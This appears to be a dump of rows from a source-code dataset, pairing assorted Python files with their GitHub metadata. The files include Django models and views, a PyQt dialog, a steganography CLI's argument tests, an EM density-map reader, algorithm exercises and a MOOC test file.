('empid', models.CharField(max_length=8, primary_key=True, serialize=False)),
('total_no_of_work_days', models.IntegerField(verbose_name=2)),
('paid_leaves', models.IntegerField(verbose_name=2)),
('non_paid_leaves', models.IntegerField(verbose_name=2)),
],
),
migrations.CreateModel(
name='Emp_pal_slip',
fields=[
('empid', models.CharField(max_length=8, primary_key=True, serialize=False)),
('empname', models.CharField(max_length=20)),
('basicpay', models.DecimalField(decimal_places=2, max_digits=8)),
('da', models.DecimalField(decimal_places=2, max_digits=8)),
('hra', models.DecimalField(decimal_places=2, max_digits=8)),
('pf', models.DecimalField(decimal_places=2, max_digits=8)),
('tax', models.DecimalField(decimal_places=2, max_digits=8)),
('tsal', models.DecimalField(decimal_places=2, max_digits=8)),
],
),
]
| [
"noreply@github.com"
] | pedhababu.noreply@github.com |
18c67769277ca4102051cfe3429e947e57a1803c | 3b1cc8ccc886599f89feaa42f2929f7ba2fbe3d1 | /virtual/lib/python3.7/site-packages/star_ratings/forms.py | 8cbd3945fadfa6a40eb0c668e5a5717f28772149 | [
"MIT"
] | permissive | AliKheirAbdi/reviewer | bb5a869bb34037f69fa16c6a73d29fc50ce84710 | 597c06e90c3eeb688b77570ced5bc45be08990de | refs/heads/master | 2022-12-03T10:25:32.353688 | 2019-11-25T07:11:31 | 2019-11-25T07:11:31 | 223,419,144 | 1 | 0 | MIT | 2022-11-22T04:50:53 | 2019-11-22T14:21:26 | Python | UTF-8 | Python | false | false | 740 | py | from __future__ import absolute_import
from django import forms
from . import get_star_ratings_rating_model
from .models import UserRating
class CreateUserRatingForm(forms.ModelForm):
    """ModelForm for submitting a single user's star rating.

    The aggregate fields (count/total/average/rating) are maintained by the
    ratings manager, so they are excluded from user input.
    """
    class Meta:
        model = UserRating
        exclude = [
            'count',
            'total',
            'average',
            'rating',
        ]

    def __init__(self, obj=None, *args, **kwargs):
        # Remember the object being rated; it is consumed by save().
        self.obj = obj
        super(CreateUserRatingForm, self).__init__(*args, **kwargs)

    def save(self, commit=True):
        # Delegate to the ratings manager rather than saving the model
        # instance directly, so the aggregates stay consistent.  ``commit``
        # is accepted for ModelForm signature compatibility only.
        data = self.cleaned_data
        return get_star_ratings_rating_model().objects.rate(
            self.obj,
            data['score'],
            user=data['user'],
            ip=data['ip']
        )
| [
"akheirali@gmail.com"
] | akheirali@gmail.com |
4df750f693ba3b892ace048b47893d684502e9c0 | 184f952a4c65575f27140b828c92204538716991 | /component/phaseCorrectionParamDialog.py | e63dcc5ae44eb4e179fdb4f7b93ec1860474621c | [] | no_license | liuchengyiu/calib | fb707f61830d9e4992920bb8d15502a03b5bea4c | 0e842b07a0ef7f1a88da2ad5cffd303448099695 | refs/heads/master | 2023-04-09T05:01:20.044748 | 2021-04-15T09:11:19 | 2021-04-15T09:11:19 | 299,260,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | from calib.window import Ui_phaseCorrectionParamDialog
from PyQt5 import QtWidgets
class My_phaseCorrectionParamDialog(QtWidgets.QDialog, Ui_phaseCorrectionParamDialog):
    """Dialog collecting per-phase correction parameters plus a weight mask."""

    def __init__(self):
        super(My_phaseCorrectionParamDialog, self).__init__()
        self.setupUi(self)
        # Both buttons merely dismiss the dialog; the caller is expected to
        # read the entered values back via getValue().
        for button in (self.okPushButton, self.cancelPushButton):
            button.clicked.connect(self.close)

    def getValue(self) -> dict:
        """Return the entered parameters.

        Each ``phase_*`` entry is a [voltage, current, power_factor] list;
        ``mask`` is the integer weight mask.
        """
        def readPhase(voltageBox, currentBox, pfBox):
            # One [voltage, current, power-factor] triple from three spinboxes.
            return [voltageBox.value(), currentBox.value(), pfBox.value()]

        return {
            'mask': self.weightMaskSpinBox.value(),
            'phase_a': readPhase(self.phaseAVoltageDoubleSpinBox,
                                 self.phaseACurrentDoubleSpinBox,
                                 self.phaseAPowerFactorDoubleSpinBox),
            'phase_b': readPhase(self.phaseBVoltageDoubleSpinBox,
                                 self.phaseBCurrentDoubleSpinBox,
                                 self.phaseBPowerFactorDoubleSpinBox),
            'phase_c': readPhase(self.phaseCVoltageDoubleSpinBox,
                                 self.phaseCCurrentDoubleSpinBox,
                                 self.phaseCPowerFactorDoubleSpinBox),
        }
| [
"1962487785@qq.com"
] | 1962487785@qq.com |
7bd37547473132d5a8e03c350d12986516583aaf | 1d951c28538375c9d1f6b88583b4dc86f2fb2a32 | /apps/login_and_registration_app/views.py | 57be555073576d67b6f8a9b9be48a50c9125e2c3 | [] | no_license | rpandy/travels | 654b7ad91fe97d7213f0187e63e277f8a5648bb9 | dc038a9c038fb7b08782df60323936f6f13ef94b | refs/heads/master | 2021-01-20T10:10:11.590181 | 2017-05-05T02:26:18 | 2017-05-05T02:26:18 | 90,329,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,309 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render, redirect
from django.contrib import messages
from .models import User
import bcrypt
# Create your views here.
def index(request):
print "Index route"
print "***********"
context = {
'users': User.objects.all()
}
return render(request, 'login_and_registration_app/index.html',context)
def register(request):
print "Register route"
print "***********"
if request.method == 'POST':
print "request.POST:", request.POST
#use valid and data to unpack 2 values from tuple
valid, data = User.objects.validate_and_create(request.POST)
if valid == True:
print "Successful registration!"
print "***********"
else:
for err in data:
messages.error(request,err)
return redirect('auth:index')
#save info in session for success page.
user_info = User.objects.validate_and_login(request.POST)
request.session['name'] = user_info[1].name
request.session['user_id'] = user_info[1].id
return redirect('travel:index')
def login(request):
print "Login route"
print "***********"
if request.method == 'POST':
print "request.POST:", request.POST
print "***********"
valid, data = User.objects.validate_and_login(request.POST)
if valid == True:
print "Successful Login"
print "***********"
else:
for err in data:
messages.error(request,err)
return redirect('auth:index')
#save info in session for success page.
user_info = User.objects.validate_and_login(request.POST)
request.session['name'] = user_info[1].name
request.session['user_id'] = user_info[1].id
# print request.user.id
print "name in session:", request.session['name']
print "id in session:",request.session['user_id']
user_id = request.session['user_id']
print "THIS IS THE USER ID-------->", user_id
# print "THIS IS THE NEW SESSION", request.session['user_id']
return redirect('travel:index')
def logout(request):
print "logout route"
print "***********"
request.session.clear()
return redirect('auth:index')
| [
"rspandy@gmail.com"
] | rspandy@gmail.com |
19f2c55be8583bb6f350ef4ab6ebd12fdfa1667a | f4689f3b1325403d4271abf566b67ba8cc00a154 | /Stegan/stegan/scripts/test/test_stegan.py | 280eff4a0889f03aedaa4cda58b016842f513f4b | [] | no_license | roneill/CS4500 | 3d12f73c6fdf76a6694e78a7a428c1dd33cfa9b3 | 5674488075dfc2a0917e2e96e93317423a26647a | refs/heads/master | 2020-04-05T23:35:40.383788 | 2012-04-18T01:29:45 | 2012-04-18T01:29:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,127 | py | import sys, os
import unittest
sys.path.insert(0, os.path.abspath(os.getcwd()))
from stegan.scripts import main
class TestStegan(unittest.TestCase):
def setUp(self):
del(sys.argv[1:])
def tearDown(self):
pass
def test_parseArgs_whenNoArguments_raiseException(self):
self.assertRaises(Exception, main.parse_args)
def test_parseArgs_whenFirstArgNotEncodeOrDecode_raiseException(self):
sys.argv.append('--unknown')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--unknown')
def test_parseArgs_whenEncodeWithTooFewArgs_raiseException(self):
sys.argv.append('--encode')
sys.argv.append('arg1')
sys.argv.append('arg2')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--encode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
def test_parseArgs_whenEncodeWithTooManyArgs_raiseException(self):
sys.argv.append('--encode')
sys.argv.append('arg1')
sys.argv.append('arg2')
sys.argv.append('arg3')
sys.argv.append('arg4')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--encode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
sys.argv.remove('arg3')
sys.argv.remove('arg4')
def test_parseArgs_whenEncodeWithCorrectParams_returnsDict(self):
expectedArgs = {
'action': 'encode',
'container': 'arg1',
'payload': 'arg2',
'trojan': 'arg3'}
sys.argv.append('--encode')
sys.argv.append('arg1')
sys.argv.append('arg2')
sys.argv.append('arg3')
self.assertEqual(expectedArgs, main.parse_args())
sys.argv.remove('--encode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
sys.argv.remove('arg3')
def test_parseArgs_whenDecodeWithTooFewArgs_raiseException(self):
sys.argv.append('--decode')
sys.argv.append('arg1')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--decode')
sys.argv.remove('arg1')
def test_parseArgs_whenDecodeWithTooManyArgs_raiseException(self):
sys.argv.append('--decode')
sys.argv.append('arg1')
sys.argv.append('arg2')
sys.argv.append('arg3')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--decode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
sys.argv.remove('arg3')
def test_parseArgs_whenDecodeWithCorrectParams_returnsDict(self):
expectedArgs = {
'action': 'decode',
'trojan': 'arg1',
'payload': 'arg2'}
sys.argv.append('--decode')
sys.argv.append('arg1')
sys.argv.append('arg2')
self.assertEqual(expectedArgs, main.parse_args())
sys.argv.remove('--decode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
if __name__ == "__main__":
unittest.main()
| [
"mrrc00@gmail.com"
] | mrrc00@gmail.com |
546e7f10c889b164d97a7716d6ad0a4d47711bdf | aa1d9d60de89f92351cf37d9e1f4df04cd9b0449 | /_exercise/_basics/_algorithm/dynamic/fibonacci.py | 38366a79f922568e2c6f9f129168af673ee39b51 | [] | no_license | zhoufengzd/python | 7ca0de97fa0050f4984d866c87ea0f3069ad3cfa | 036e2e17fde91c5ef46b22af00fc73e41bf75428 | refs/heads/master | 2022-10-13T23:10:10.538705 | 2022-09-25T03:51:26 | 2022-09-25T03:51:26 | 209,899,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | def fibonacci(n: int):
f = {0: 0, 1: 1}
for i in range(2, n + 1):
f[i] = f[i - 1] + f[i - 2]
return f[n]
def fibonacci3(n: int):
"sum of three previous numbers"
f = {0: 1, 1: 1, 2: 1}
for i in range(3, n + 1):
f[i] = f[i - 1] + f[i - 2] + f[i - 3]
return f[n]
if __name__ == "__main__":
# for n in [1, 2, 5, 50, 100]:
# print("{} => {}".format(n, fibonacci(n)))
for n in range(0, 10):
print("{} => {}".format(n, fibonacci3(n)))
| [
"zhoufengzd@gmail.com"
] | zhoufengzd@gmail.com |
3cc745f34716dfeb254720f8c0c01a80b7c5d438 | 67ca269e39935d0c439329c3a63df859e40168bb | /autoPyTorch/pipeline/components/setup/lr_scheduler/constants.py | 2e5895632deb9caa92b26070d7495d27d57ba970 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-philippe-de-muyter"
] | permissive | automl/Auto-PyTorch | 2e67ffb44f40d9993470ded9b63f10a5164b41df | 56a2ac1d69c7c61a847c678879a67f5d3672b3e8 | refs/heads/master | 2023-07-14T22:55:57.826602 | 2022-08-23T16:43:15 | 2022-08-23T16:43:15 | 159,791,040 | 2,214 | 280 | Apache-2.0 | 2023-04-04T14:41:15 | 2018-11-30T08:18:34 | Python | UTF-8 | Python | false | false | 450 | py | from enum import Enum
class StepIntervalUnit(Enum):
"""
By which interval we perform the step for learning rate schedulers.
Attributes:
batch (str): We update every batch evaluation
epoch (str): We update every epoch
valid (str): We update every validation
"""
batch = 'batch'
epoch = 'epoch'
valid = 'valid'
StepIntervalUnitChoices = [step_interval.name for step_interval in StepIntervalUnit]
| [
"noreply@github.com"
] | automl.noreply@github.com |
744ef4550ea1381e96181d3d0cf7df33ca8a133d | 762de1c66746267e05d53184d7854934616416ee | /tools/MolSurfGenService/MolSurfaceGen32/chimera/share/VolumeData/tom_em/em_format.py | 6c027e9831ce8864e76310e1e1193380a04ead29 | [] | no_license | project-renard-survey/semanticscience | 6e74f5d475cf0ebcd9bb7be6bb9522cf15ed8677 | 024890dba56c3e82ea2cf8c773965117f8cda339 | refs/heads/master | 2021-07-07T21:47:17.767414 | 2017-10-04T12:13:50 | 2017-10-04T12:13:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,434 | py | # -----------------------------------------------------------------------------
# Read TOM Toolbox EM density map file (http://www.biochem.mpg.de/tom/)
# electron microscope data.
#
# Byte swapping will be done if needed.
#
# -----------------------------------------------------------------------------
#
class EM_Data:
def __init__(self, path):
self.path = path
import os.path
self.name = os.path.basename(path)
file = open(path, 'rb')
file.seek(0,2) # go to end of file
file_size = file.tell()
file.seek(0,0) # go to beginning of file
# Determine byte order from machine code
# OS-9 0
# VAX 1
# Convex 2
# SGI 3
# Sun 4 (not supported)
# Mac 5
# PC 6
self.swap_bytes = False
from numpy import int8, little_endian
machine_code = self.read_values(file, int8, 1)
file_little_endian = machine_code in (1, 6)
self.swap_bytes = ((file_little_endian and not little_endian) or
(not file_little_endian and little_endian))
file.seek(0,0)
v = self.read_header_values(file)
self.check_header_values(v, file_size)
self.data_offset = file.tell()
file.close()
self.data_size = (v['xsize'], v['ysize'], v['zsize'])
dstep = v['pixelsize']
if dstep == 0:
dstep = 1.0
self.data_step = (dstep, dstep, dstep)
self.data_origin = (0., 0., 0.)
# ---------------------------------------------------------------------------
# Format derived from C header file mrc.h.
#
def read_header_values(self, file):
from numpy import int8, int32
i8 = int8
i32 = int32
v = {}
v['machine code']= self.read_values(file, i8, 1)
v['os 9 version']= self.read_values(file, i8, 1)
v['abandoned header']= self.read_values(file, i8, 1)
v['data type code']= self.read_values(file, i8, 1)
v['xsize'], v['ysize'], v['zsize'] = self.read_values(file, i32, 3)
v['comment'] = file.read(80)
v['user param'] = self.read_values(file, i32, 40)
v['pixelsize'] = v['user param'][6] / 1000.0 # nm
v['user data'] = file.read(256)
return v
# ---------------------------------------------------------------------------
#
def check_header_values(self, v, file_size):
mc = v['machine code']
if mc < 0 or mc > 6:
raise SyntaxError, ('Bad EM machine code %d at byte 0, must be 0 - 6.'
% mc)
dc = v['data type code']
if not dc in (1,2,4,5,8,9):
raise SyntaxError, ('Bad EM data type code %d' % dc +
', must be 1, 2, 4, 5, 8, or 9')
from numpy import uint8, int16, int32, float32, float64
types = { 1: uint8,
2: int16,
4: int32,
5: float32,
9: float64 }
if types.has_key(dc):
self.element_type = types[dc]
else:
raise SyntaxError, 'Complex EM data value type not supported'
if float(v['xsize']) * float(v['ysize']) * float(v['zsize']) > file_size:
raise SyntaxError, ('File size %d too small for grid size (%d,%d,%d)'
% (file_size, v['xsize'],v['ysize'],v['zsize']))
# ---------------------------------------------------------------------------
#
def read_values(self, file, etype, count):
from numpy import array
esize = array((), etype).itemsize
string = file.read(esize * count)
values = self.read_values_from_string(string, etype, count)
return values
# ---------------------------------------------------------------------------
#
def read_values_from_string(self, string, etype, count):
from numpy import fromstring
values = fromstring(string, etype)
if self.swap_bytes:
values = values.byteswap()
if count == 1:
return values[0]
return values
# ---------------------------------------------------------------------------
# Returns 3D NumPy matrix with zyx index order.
#
def read_matrix(self, ijk_origin, ijk_size, ijk_step, progress):
from VolumeData.readarray import read_array
matrix = read_array(self.path, self.data_offset,
ijk_origin, ijk_size, ijk_step,
self.data_size, self.element_type, self.swap_bytes,
progress)
return matrix
| [
"alex.gawronski@d60594c4-dda9-11dd-87d8-31aa04531ed5"
] | alex.gawronski@d60594c4-dda9-11dd-87d8-31aa04531ed5 |
de03cdcacdea8bd7119753b7c842dea1c168ba07 | df2a8f791b8c4091add7fd18e32ad44a977310c6 | /2 Regression/Random_Forest_Regression/random_forest_regression1.py | 35994bd4062b9499323d23db48ed9f48f40386d0 | [] | no_license | raviagrawal121/machine_learning_for_datascienec | 3508b1c3394eeb35f20145fa46533965479e684a | 3afffc04efce9572433330edecf96580b819db21 | refs/heads/master | 2023-05-24T19:00:42.028399 | 2019-06-20T09:27:32 | 2019-06-20T09:27:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,410 | py | # Random Forest Regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:2].values
y = dataset.iloc[:, 2].values
# Splitting the dataset into the Training set and Test set
"""from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)"""
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)"""
# Fitting the Random Forest Regression Model to the dataset
from sklearn.ensemble import RandomForestRegressor
regressor = RandomForestRegressor(n_estimators = 300,random_state = 0)
regressor.fit(X,y)
# Predicting a new result
y_pred = regressor.predict(np.array([[6.5]]))
# Visualising the RRandom Forest Regression results (for higher resolution and smoother curve)
X_grid = np.arange(min(X), max(X), 0.1)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color = 'red')
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.title('Truth or Bluff (Random Forest Regression Model)')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show() | [
"noreply@github.com"
] | raviagrawal121.noreply@github.com |
b4486e22f0b890e149030edb2bdfd81b24a0c565 | c338114a630553f457f9f6a121919cb214776651 | /core/migrations/0006_expense.py | 2b24b6d0bff17a4546ba017e374eba2ae4856ee8 | [] | no_license | ino-shan/catwellbeing | e5dbc46aef21219d9d7d9796cb71f592f249a203 | 7dc3146233c6dcce709ecbbe328e48678dda0510 | refs/heads/master | 2022-07-04T12:39:09.282894 | 2020-05-11T04:27:11 | 2020-05-11T04:27:11 | 262,936,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 975 | py | # Generated by Django 2.2.5 on 2020-03-27 16:04
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('core', '0005_auto_20200327_1245'),
]
operations = [
migrations.CreateModel(
name='Expense',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=1024)),
('cost', models.FloatField()),
('expense_date', models.DateField()),
('cat', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Cat')),
('expender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"inoshanilangeswaran@hotmail.co.uk"
] | inoshanilangeswaran@hotmail.co.uk |
778ae380f0cad62eb41f8e8dbe2862993143ee93 | 495907c7e2e2d591df2d6906335c3d89c5a4a47b | /helpers/logHelpers.py | 42129a0969e389b0136e85078c31651d76b26bbb | [] | no_license | ePandda/idigpaleo-ingest | 319194125aded01f018cfb7c1fe7044fe8c66770 | 8473ab31e7a56878236136d0ace285ab3738f208 | refs/heads/master | 2020-11-26T19:48:13.959972 | 2018-04-21T17:19:38 | 2018-04-21T17:19:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | #
# Class for logining status/errors from the ingest
#
# Uses the main pythn logging module
import logging
import time
def createLog(module, level):
logger = logging.getLogger(module)
if level:
checkLevel = level.lower()
else:
checkLevel = 'warning'
levels = {'debug': logging.DEBUG, 'info': logging.INFO, 'warning': logging.WARNING, 'error': logging.ERROR, 'critical': logging.CRITICAL}
today = time.strftime("%Y_%m_%d")
loggerFile = './logs/'+today+"_ingest.log"
fileLog = logging.FileHandler(loggerFile)
conLog = logging.StreamHandler()
if checkLevel in levels:
logger.setLevel(levels[checkLevel])
fileLog.setLevel(levels[checkLevel])
conLog.setLevel(levels[checkLevel])
else:
fileLog.setLevel(levels['warning'])
conLog.setLevel(levels['warning'])
formatter = logging.Formatter('%(asctime)s_%(name)s_%(levelname)s: %(message)s')
fileLog.setFormatter(formatter)
conLog.setFormatter(formatter)
logger.addHandler(fileLog)
logger.addHandler(conLog)
return logger
| [
"mwbenowitz@gmail.com"
] | mwbenowitz@gmail.com |
5b7de37d3e3ae6122a53cb151f264294e1e07cfd | 4ec57b6ca1125feb546487ebf736fb1f7f3531ce | /src/bin/huawei_server/collect.py | 7e38908b1087dbed5c09a721f9b18ad0fac206cd | [
"MIT"
] | permissive | Huawei/Server_Management_Plugin_Nagios | df595b350ef1cf63347725e443b518c521afde5a | fbfbb852a90b6e1283288111eadbd49af2e79343 | refs/heads/master | 2022-09-14T15:59:48.438453 | 2022-08-22T03:19:20 | 2022-08-22T03:19:20 | 120,845,298 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,370 | py | #encoding:utf-8
import sys
import os
import traceback
from config import VERSTION_STR
from base.logger import Logger
from model.plugin import LoggerConfig
from service.collectservice import CollectService
from util.common import Common
from util.check import Check
from constant.constant import *
from threading import Timer
import time
def loggerConfig(node, loggerData):
elements = Common.getChild(node);
if elements is None:
return False;
for element in elements:
if "param" != element.tag:
return False;
if "level" == element.attrib.get("name"):
loggerData.setLoggerLevel(element.text);
elif "size" == element.attrib.get("name"):
loggerData.setLoggerSize(element.text);
elif "index" == element.attrib.get("name"):
loggerData.setLoggerIndex(element.text);
loggerData.setLoggerPath(Common.getExePath() + os.path.sep + "log");
return True;
def pluginConfig(loggerData):
if not os.path.exists(Common.getPluginConfigPath()):
return False;
root = Common.getRoot(Common.getPluginConfigPath());
if root is None:
return False;
for node in Common.getChild(root):
if "config" != node.tag:
return False;
if "log" == node.attrib.get('name'):
loggerConfig(node, loggerData);
return True;
def initPlugin():
#parse plugin config
loggerData = LoggerConfig();
if not pluginConfig(loggerData):
return False;
logger = Logger.getInstance().init(loggerData);
return True;
def main(argv=None):
if not initPlugin():
return -1;
Logger.getInstance().error('========= %s ======='%VERSTION_STR)
if(len(argv) < 2):
Logger.getInstance().error("main error: param length should not be zero.");
return -1;
try:
if "-p" == argv[1]:
if not Check.checkPluginModeParam(argv[2:]):
Logger.getInstance().error("main error: param is invalid, param=%s." % sys.argv[1:]);
return -1;
service = CollectService(COLLECT_MODE_CMD_PLUGIN, None);
elif "-a" == argv[1]:
if not Check.checkTotalModeParam(argv[2:]):
Logger.getInstance().error("main error: param is invalid, param=%s." % sys.argv[1] );
return -1;
service = CollectService(COLLECT_MODE_CMD_TOTAL, argv[2:]);
elif "-f" == argv[1]:
if not Check.checkFileModeParam(argv[2:]):
Logger.getInstance().error("main error: param is invalid, param=%s." % sys.argv[1] );
return -1;
service = CollectService(COLLECT_MODE_CMD_FILE, argv[2:]);
else:
Logger.getInstance().error("main error: option param is invalid optoion : [%s]" % (argv[1]));
return -1
return service.start();
except Exception, e:
Logger.getInstance().exception("main exception: collect device info exception: [%s]" % e);
return -1
if __name__ == "__main__":
timeInteval = 300
while True:
t = Timer(timeInteval ,sys.exit(main(sys.argv)) )
t.start()
time.sleep(300)
| [
"31431891+serverplugin@users.noreply.github.com"
] | 31431891+serverplugin@users.noreply.github.com |
3f85bc19f49701b121a391821a49fa058ebe6c03 | ea5bbdc22cc929ae67f85ab674013ad7c1dcbe20 | /baekjoon/13460.py | 616f1ddf99b42c8110df0c4e23ba2c5f7f15b3f2 | [] | no_license | ssMinji/Algorithms | d1fbd3089c8df43cd80b89f7f345cc28ac18d40c | 1ab8aaec1801059836e47cc868b715bfcdfc5072 | refs/heads/master | 2021-10-27T22:29:26.484647 | 2021-10-20T08:00:19 | 2021-10-20T08:00:19 | 228,370,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,820 | py | dx = [0, 0, 1, -1]
dy = [1, -1, 0, 0]
LIMIT = 10
class Result:
def __init__(self, moved, hole, x, y):
self.moved = moved
self.hole = hole
self.x = x
self.y = y
def gen(k):
a = [0]*LIMIT
for i in range(LIMIT):
a[i] = (k&3)
k >>= 2
return a
def simulate(a, k, x, y): # 지도, 방향, 좌표
n = len(a)
m = len(a[0])
if a[x][y] == '.': # 이미 구멍에 빠졌다는 것
return Result(False, False, x, y) # moved, hole, x, y
moved = False
while True:
nx, ny = x + dx[k], y+dy[k]
ch = a[nx][ny]
if ch == '#':
return Result(moved, False, x, y)
elif ch in 'RB':
return Result(moved, False, x, y)
elif ch == '.':
a[x][y], a[nx][ny] = a[nx][ny], a[x][y]
x, y = nx, ny
moved = True
elif ch == 'O':
a[x][y] = '.'
moved = True
return Result(moved, True, x, y)
def check(a, dirs):
n = len(a)
m = len(a[0])
hx, hy = 0, 0 # 구멍위치
rx, ry = 0, 0 # 빨간 공 위치
bx, by = 0, 0 # 파란 공 위치
for i in range(n):
for j in range(m):
if a[i][j] == 'O':
hx, hy = i, j
elif a[i][j] == 'R':
rx, ry = i, j
elif a[i][j] == 'B':
bx, by = i, j
cnt = 0
for k in dirs:
cnt += 1
hole1 = hole2 = False
while True:
p1 = simulate(a, k, rx, ry) # 빨간공이동
rx, ry = p1.x, p1.y
p2 = simulate(a, k, bx, by) # 파란공이동
bx, by = p2.x, p2.y
if not p1.moved and not p2.moved: #둘다 이동하지 않을때까지 반복
break
if p1.hole:
hole1 = True
if p2.hole:
hole2 = True
if hole2: # 파란공이 구멍에 빠졌을 경우 -1
return -1
if hole1:
return cnt
return -1 # 10번 횟수 초과
def valid(dirs):
for i in range(len(dirs)-1):
if dirs[i] == dirs[i+1]: return False
if dirs[i] == 0 and dirs[i+1] == 1: return False
if dirs[i] == 1 and dirs[i+1] == 0: return False
if dirs[i] == 2 and dirs[i+1] == 3: return False
if dirs[i] == 3 and dirs[i+1] == 2: return False
return True
n, m = map(int, input().split())
original = [input() for _ in range(n)]
ans = -1
for k in range(1<<(LIMIT*2)): # 모든 경우의 수 (2^20)
dirs = gen(k) # 이동 방향
if not valid(dirs):
continue
a = [list(row) for row in original]
cur = check(a, dirs)
if cur == -1:
continue
if ans == -1 or ans > cur:
ans = cur
print(ans) | [
"ssong758@gmail.com"
] | ssong758@gmail.com |
aa5fff7a5e0ab14cea8e79c76cc086b69009ec2b | 378ad0c10fdb35e83c8bd1640202518acaa936f5 | /osa08-01_pienin_keskiarvo/test/test_pienin_keskiarvo.py | 0915d4cb9665d54327c18f1ab20700619a8c3480 | [] | no_license | sami-one/mooc-ohjelmointi-21 | cc1af96f0accdf18e2c4bbcbaa236a00e1d905bf | ba41b099be16ed55a5fd3ebe113fd145ba8d88f4 | refs/heads/main | 2023-05-02T12:12:09.233333 | 2021-05-27T13:10:52 | 2021-05-27T13:10:52 | 371,375,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,603 | py | import unittest
from unittest.mock import patch
from tmc import points
from tmc.utils import load, load_module, reload_module, get_stdout, check_source
from functools import reduce
import os
import os.path
import textwrap
from random import choice, randint
exercise = 'src.pienin_keskiarvo'
function = "pienin_keskiarvo"
def hlo(t: tuple):
return {"nimi": "Anna", "tulos1": t[0], "tulos2": t[1], "tulos3": t[2]}
def par(t1: tuple, t2: tuple, t3: tuple):
s = "("
for t in (t1,t2,t3):
s += "{" + ",".join([f'"tulos{x}": {t[x-1]}' for x in range(1,4)]) + "}" + ", "
return s[:-2] + ")"
@points('8.pienin_keskiarvo')
class PieninKeskiarvoTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with patch('builtins.input', side_effect=[AssertionError("Syötteen pyytämistä ei odotettu")]):
cls.module = load_module(exercise, 'fi')
def test_0a_paaohjelma_kunnossa(self):
ok, line = check_source(self.module)
message = """Funktioita testaava koodi tulee sijoittaa lohkon
if __name__ == "__main__":
sisälle. Seuraava rivi tulee siirtää:
"""
self.assertTrue(ok, message+line)
def test1_funktio_olemassa(self):
try:
from src.pienin_keskiarvo import pienin_keskiarvo
except:
self.assertTrue(False, "Ohjelmastasi pitäisi löytyä funktio nimeltä pienin_keskiarvo(h1: dict, h2: dict, h3: dict)")
def test2_palautusarvon_tyyppi(self):
try:
from src.pienin_keskiarvo import pienin_keskiarvo
val = pienin_keskiarvo(hlo((1,1,1)), hlo((2,2,2)), hlo((3,3,3)))
taip = str(type(val)).replace("<class '","").replace("'>","")
self.assertTrue(type(val) == dict, f"Funktion pienin_keskiarvo pitäisi palauttaa arvo, joka on tyyppiä dict," +
f" nyt se palauttaa arvon {val} joka on tyyppiä {taip}\n kun sitä kutsutaan parametreilla {par((1,1,1),(2,2,2),(3,3,3))}")
except:
self.assertTrue(False, f"Funktio antoi virheen kun sitä kutsuttiin parametrien arvoilla {par((1,1,1),(2,2,2),(3,3,3))}")
def test3_testaa_arvot(self):
test_cases = [((1,1,1),(2,2,2),(3,3,3)), ((9,9,9),(7,7,7),(8,8,8)), ((3,3,3),(5,5,5), (1,1,1)),
((5,3,1),(6,4,2),(2,2,2)), ((9,3,8),(9,4,9),(9,6,8)), ((6,0,0), (5,0,0), (3,3,3)),
((6,4,4),(5,7,7),(4,8,8)), ((4,3,4),(4,2,4),(4,3,4)), ((6,2,2), (5,2,2), (5,2,3))]
for test_case in test_cases:
with patch('builtins.input', side_effect=[AssertionError("Syötteen pyytämistä ei odotettu")]):
reload_module(self.module)
pienin_keskiarvo = load(exercise, function, 'fi')
h1 = hlo(test_case[0])
h2 = hlo(test_case[1])
h3 = hlo(test_case[2])
results = [sum(test_case[0]),sum(test_case[1]),sum(test_case[2])]
results.sort()
if results[0] == results[1]:
self.fail("virhe testeissä: pienin keskiarvo ei ole yksikäsitteinen")
val = pienin_keskiarvo(h1, h2, h3)
t1 = hlo(test_case[0])
t2 = hlo(test_case[1])
t3 = hlo(test_case[2])
corr = min((t1,t2,t3), key=lambda x: ((x["tulos1"]+x["tulos2"]+x["tulos3"]) / 3))
self.assertEqual(val, corr, f"Funktion pitäisi palauttaa \n{corr}\nmutta se palauttaa \n{val}\nkun parametrit ovat\n{par(test_case[0], test_case[1], test_case[2])}")
